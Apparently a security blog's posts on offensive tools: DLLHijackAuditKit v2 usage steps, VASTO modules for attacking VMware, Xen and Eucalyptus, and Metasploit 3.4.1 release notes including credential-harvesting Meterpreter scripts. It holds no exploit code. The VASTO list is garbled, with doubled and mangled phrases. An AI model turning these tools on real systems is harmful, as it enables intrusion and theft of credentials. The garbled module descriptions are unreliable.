The latest buzz word in the information security industry is “insecure DLL loading“, “DLL hijacking” or “DLL preloading“. Mr. HD Moore, the author of Metasploit has gone ahead and made it VERY easier for a lot of us to test such attacks at leisure. Hence you see such a spurt in proof-of-concept codes online! Mr. Peter Van Eeckhoutte has been maintaining a list of such vulnerable applications on his wonderful blog hosted here.
This toolkit uses native JScript, automatically kills spawned processes, reduces the memory usage by ProcMon, and automatically validates every result from the CSV log. This is a complete re-write from the version 1 of the tool. This kit will turn your desktop PC into a vulnerability mincing machine by launching the file handlers for every registered file type, while recording whether or not a DLL was accessed within the working directory of the associated file! The DLLHijackAuditKit will help you verify if a application is vulnerable to DLL preloading attacks.
How to use DLLHijackAuditKit v2? 1. Download ProcMon from here and copy the procmon.exe binary into the DLLHijackAuditKit directory. Launch the Process Monitor, accept the EULA, and exit. 2. Download Ruby from here and install it normally. 3 .Browse to this directory and launch 01_StartAudit.bat as an Administrator. The Administrator bit is important, as it will allow the script to kill background services that are spawned by the handlers and prevent UAC popups. 4. After the audit script completes (15-30 minutes), switch to the Process Monitor window, and access File->Save from the menu. Save the resulting log in CSV format to the local directory with the name “Logfile.CSV”. 5. Launch 02_Analyze.bat as an Administrator. This will scan through the CSV log, build test cases for each potential vulnerability, try them, and automatically create a proof-of-concept within the Exploits directory should they succeed. 6. Identify the affected vendor for each generated proof-of-concept and ask them nicely to fix their application. Send them the calc.exe-launching PoC if necessary.
It is very easy to use but looking at today’s emerging tool this is small and also does the work! There are some known issues with this tool working on a Windows XP machine, etc. Hopefully Mr. Moore fixes them soon. Till then you can try being a vulnerability discoverer with this simple tool! Grab your pie while this vuln is hot!
New and improved verion of VASTO is ready for action.
“VASTO is a Virtualization Asessment Toolkit, a collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions. It has been sponsored by Secure Network and includes contributions by fellow hackers. It has been sponsored by Secure Network and includes contributions by fellow hackers.“
Changes made in VASTO:
- Abiquo_guest_stealer.rb Exploits a path traversal in Abiquo up to version 1.5 A path traversal exploits in Abiquo up to version 1.5
It has been tested under Metasploit 3.4.2 and Ubuntu Linux, It has been tested under Metasploit 3.4.2 and Ubuntu Linux, but should work (maybe with minimal modifications) under but should work (maybe with minimal modifications) under Windows or any platform supported by Metasploit. Windows or any platform supported by Metasploit.
The current version, 0.3, was released at Black Hat US 2010.
Modules currently implemented: - abiquo_guest_stealer.rb – Abiquo_guest_stealer.rb Exploits a path traversal in Abiquo up to version 1.5 A path traversal exploits in Abiquo up to version 1.5 - abiquo_poison.rb – Abiquo_poison.rb Serves evil VM if a MITM is performed. Serves evil VM if a MITM is performed. - eucalyptus_bouncer.rb – Eucalyptus_bouncer.rb Turn Eucalyptus systems in proxy servers. Turn Eucalyptus systems in proxy servers. - eucalyptus_poison.rb – Eucalyptus_poison.rb Serves evil VM if a MITM is performed. Serves evil VM if a MITM is performed. - vmware_guest_stealer.rb – Vmware_guest_stealer.rb Exploits a path traversal in VMware products. products exploits a path traversal in VMware. - vmware_login.rb – Vmware_login.rb Brute forcing for VMware Brute forcing for VMware - vmware_session_rider.rb – Vmware_session_rider.rb Local proxy to ride stolen SOAPID sessions with VI Client Local proxy to ride stolen SOAPID sessions with VI Client - vmware_sfcbd_exec.rb – Vmware_sfcbd_exec.rb Command exec (authenticated) on Studio and Data Protection Command exec (authenticated) on Studio and Data Protection - vmware_studio_upload.rb – Vmware_studio_upload.rb Arbitrary file upload on Studio 2.0 beta Arbitrary file upload on Studio 2.0 beta - vmware_updatemanager_traversal.rb – Vmware_updatemanager_traversal.rb Jetty path traversal Jetty path traversal - vmware_version.rb – Vmware_version.rb Fingerprints VMware products Fingerprints VMware products - vmware_vilurker.rb – Vmware_vilurker.rb MITM code execution against VI Client MITM code execution against VI Client - vmware_webaccess_portscan.rb – Vmware_webaccess_portscan.rb Turn VMware WebAccess into a portscanner (or a proxy) VMware WebAccess turn into a port scanner (or a proxy) - vmware_autopwn – Vmware_autopwn Automatizes exploiting the updatemanager traversal to ride a session Automatizes exploiting the update manager to ring traversal session - xen_login.rb – Xen_login.rb Brute forcer for XEN server Brute forcer for XEN server
The Metasploit Framework has been updated to version 3.4.1 in less than 3 months!
Metasploit Framework 3.4.1
“The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.“
Statistics:
Metasploit now has 567 exploits and 283 auxiliary modules (up from 551 and 261 in v3.4)
Over 40 community reported bugs were fixed and numerous interfaces were improved
General:
The Windows installer now ships with a working Postgres connector
New session notifications now always print a timestamp regardless of the TimestampOutput setting
Addition of the auxiliary/scanner/discovery/udp_probe module, which works through Meterpreter pivoting
HTTP client library is now more reliable when dealing with broken/embedded web servers
Improvements to the database import code, covering NeXpose, Nessus, Qualys, and Metasploit Express
The msfconsole “connect” command can now speak UDP (specify the -u flag)
Nearly all exploit modules now have a DisclosureDate field
HTTP fingerprinting routines added to some exploit modules
The psexec module can now run native x64 payloads on x64 based Windows systems
A development style guide has been added in the HACKING file in the SVN root
FTP authentication bruteforce modules added
Payloads:
Some Meterpreter scripts (notably persistence and getgui) now create a resource file to undo the changes made to the target system.
Meterpreter scripts that create logs and download files now save their data in the ~.msf3/logs/scripts folder.
New Meterpreter Scripts:
enum_firefox – Enumerates Firefox data like history, bookmarks, form history, typed URLs, cookies and downloads databases.
arp_scanner – Script for performing ARP scan for a given CIDR.
enum_vmware – Enumerates VMware producst and their configuration.
enum_putty – Enumerates recent and saved connections.
get_filezilla_creds – Enumerates recent and saved connections and extracts saved credentials.
enum_logged_on_users – Enumerate past users that logged in to the system and current connected users.
get_env – Extracts all user and system environment variables.
get_application_lits – Enumerates installed applications and their version.
autoroute – Sets a route from within a Meterpreter session without the need to background the sessions.
panda_2007_pavsrv53 – Panda 2007 privilege escalation exploit.
Support for a dns bypass list added to auxiliary/server/fakedns. It allows the user to specify which domains to resolve externally while returning forged records for everything else. Thanks to Rudy Ruiz for the patch.
Railgun – The Meterpreter “RAILGUN” extension by Patrick HVE has merged and is now available for scripts.
PHP Meterpreter – A protocol-compatible port of the original Meterpreter payload to PHP. This new payload adds the ability to pivot through webservers regardless of the native operating system
Token impersonation now works with “execute -t” to spawn new commands with a stolen token.
This release sees the first official non-Windows Meterpreter payload, in PHP as discussed last month. A new extension called Railgun is now integrated into Meterpreter courtesy of Patrick HVE, giving you scriptable access to Windows APIs and an unprecedented amount of control over post-exploitation. For those of you wishing to contribute to the framework, a new file called HACKING has been introduced that lays out a few guidelines for making it easier.
This release has 16 new exploits, 22 new auxiliary modules and 11 new Meterpreter scripts for your pwning enjoyment.
